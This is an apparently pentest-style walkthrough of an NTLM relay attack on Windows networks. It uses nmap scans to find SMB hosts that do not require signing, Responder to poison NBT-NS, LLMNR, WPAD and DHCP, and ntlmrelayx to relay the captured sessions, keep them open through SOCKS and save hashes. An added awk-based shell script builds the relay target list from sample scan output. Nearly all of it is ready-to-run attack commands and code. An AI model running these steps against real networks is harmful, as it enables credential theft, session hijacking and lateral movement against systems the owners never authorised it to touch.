IPv4
First create a target list of hosts with SMB open (the scan and the extraction are two separate commands; matching 445/open rather than just open keeps the Status: lines and any open|filtered results out of the list):
nmap -p445 -sS -iL live_ips.txt -oA 445_scan
grep '445/open/' 445_scan.gnmap | cut -d' ' -f2 > open_445.txt
Then find hosts with SMB signing disabled or not required. smb-security-mode checks SMB1 and smb2-security-mode checks SMB2/3, so run both and merge the results. Note that sed only treats | as alternation with -E; without it the original pattern matched the literal string "disabled|not" and never fired. The SMB1 script reports signing that is enabled but not required as message_signing: supported, so that value is matched as well (anchored on the field name, because the unrelated challenge_response line also says supported). -n keeps nmap from resolving names, so the IP is always field 5 of the "Nmap scan report for" line:
nmap -n --script smb-security-mode.nse -p445 -iL open_445.txt -oA smb_script
sed -En '/^Nmap/h;/message_signing: (disabled|supported)/{g;p;}' smb_script.nmap | cut -d' ' -f5 > smb_disabled.txt
nmap -n --script smb2-security-mode.nse -p445 -iL open_445.txt -oA smb2_script
sed -En '/^Nmap/h;/disabled|not required/{g;p;}' smb2_script.nmap | cut -d' ' -f5 >> smb_disabled.txt
sort -u -o smb_disabled.txt smb_disabled.txt
Start poisoning NBT-NS, LLMNR, WPAD and DHCP with Responder (-w answers WPAD requests, -d answers DHCP broadcasts). Before relaying, set SMB = Off and HTTP = Off in Responder.conf so Responder only poisons and does not answer the SMB/HTTP connections itself; otherwise it captures the NetNTLM hash and ntlmrelayx never sees the session:
responder -I eth0 -wd
Finally relay the poisoned sessions to the signing-disabled hosts. -tf takes the target list built above (one host per line), -smb2support lets the relay speak SMB2 to the victims, -socks keeps each successfully relayed session open behind a SOCKS proxy for later use, and -of writes any captured hashes to a file:
ntlmrelayx.py -tf smb_disabled.txt -socks -smb2support -of hashes2
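The list-building part of the procedure above, as an added example that is not part of the original page: a POSIX shell script that parses the two kinds of nmap output with awk instead of the sed/cut one-liners. It handles the "Nmap scan report for host (ip)" form nmap prints when a name resolved, matches the SMB1 script's "supported" value only on the message_signing field, and deduplicates hosts that show up in both signing scans. The sample scan output embedded below is constructed (modeled on the .gnmap format and the wording of smb-security-mode and smb2-security-mode); the hosts 10.0.0.5 to 10.0.0.8 are assumptions.

```shell
#!/bin/sh
# Added example, not from the original page: build the ntlmrelayx target list
# from the outputs of the 445 port scan and the two SMB signing script scans.
# All scan output below is constructed sample data; the hosts are assumptions.

# Constructed .gnmap output of: nmap -p445 -sS -iL live_ips.txt -oA 445_scan
SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap -p445 -sS -iL live_ips.txt -oA 445_scan
Host: 10.0.0.5 () Status: Up
Host: 10.0.0.5 () Ports: 445/open/tcp//microsoft-ds///
Host: 10.0.0.6 () Ports: 445/open/tcp//microsoft-ds///
Host: 10.0.0.7 () Ports: 445/open/tcp//microsoft-ds///
Host: 10.0.0.8 () Ports: 445/filtered/tcp//microsoft-ds///
# Nmap done -- 4 IP addresses (4 hosts up) scanned'

# Constructed .nmap output of the smb2-security-mode and smb-security-mode
# scans, concatenated. 10.0.0.5 appears in both; 10.0.0.7 resolved to a name.
SAMPLE_NMAP='Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.0.0.6
Host is up (0.0012s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for fileserver (10.0.0.7)
Host is up (0.0020s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported'

# Hosts with 445 open, from greppable output on stdin. The Host: line carries
# the IP in field 2; the trailing slash in "445/open/" keeps "open|filtered"
# results out, and the Status: lines never match.
open_445_hosts() {
  awk '/^Host: / && /445\/open\// { print $2 }' | sort -u
}

# Hosts whose report says signing is disabled or not required, from normal
# output on stdin. The current host is taken from the last field of each
# "Nmap scan report for" line, stripping the parentheses nmap adds around the
# IP when a hostname resolved. The SMB1 script prints "message_signing:
# supported" when signing is enabled but not required, so that is matched on
# the field name only (the challenge_response line also says "supported").
# Each host is printed at most once per report; sort -u merges the two scans.
unsigned_hosts() {
  awk '
    /^Nmap scan report for / {
      host = $NF; sub(/^\(/, "", host); sub(/\)$/, "", host)
      flagged = 0
      next
    }
    /Message signing.*(disabled|not required)/ ||
    /message_signing: (disabled|supported)/ {
      if (!flagged) { print host; flagged = 1 }
    }
  ' | sort -u
}

# Demo on the constructed samples. In a real run the inputs are
# 445_scan.gnmap and the .nmap files of the two script scans, and the second
# list is what ntlmrelayx -tf reads.
printf '%s\n' "$SAMPLE_GNMAP" | open_445_hosts
printf '%s\n' "$SAMPLE_NMAP" | unsigned_hosts
```

On the samples, open_445_hosts prints 10.0.0.5, 10.0.0.6 and 10.0.0.7 (10.0.0.8 was filtered), and unsigned_hosts prints 10.0.0.5 and 10.0.0.7: 10.0.0.6 requires signing, 10.0.0.7 is picked up through the hostname form of the report line, and 10.0.0.5 is listed once even though both scans flagged it.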